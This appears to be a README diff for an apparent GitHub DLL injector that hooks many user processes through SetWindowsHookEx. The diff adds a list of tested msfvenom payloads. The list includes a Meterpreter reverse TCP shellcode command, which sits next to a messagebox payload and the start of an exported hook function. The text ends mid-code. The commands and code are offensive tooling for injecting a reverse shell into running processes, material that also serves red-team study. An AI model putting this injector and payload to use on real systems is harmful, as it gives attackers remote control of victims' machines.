Msfv3n0m/Global-SetWindowsHookEx-Injector/README.md

 # Global-SetWindowsHookEx-Injector
 Hooks a bunch of user processes with a dll that launches a thread that spawns a messagebox whenever it is loaded
+## Payloads that have been tested with this project
 `msfvenom -f c -p windows/x64/messagebox EXITFUNC=thread TEXT="Hello, from urmom"`
+`msfvenom -p windows/x64/meterpreter_reverse_tcp EXITFUNC=thread RHOST=127.0.0.1 RPORT=4444 -f c -o file.txt`
 ## Usage
 1. Just add this to your dll:
 extern "C" __declspec(dllexport) int NextHook(int code, WPARAM wParam, LPARAM lParam) {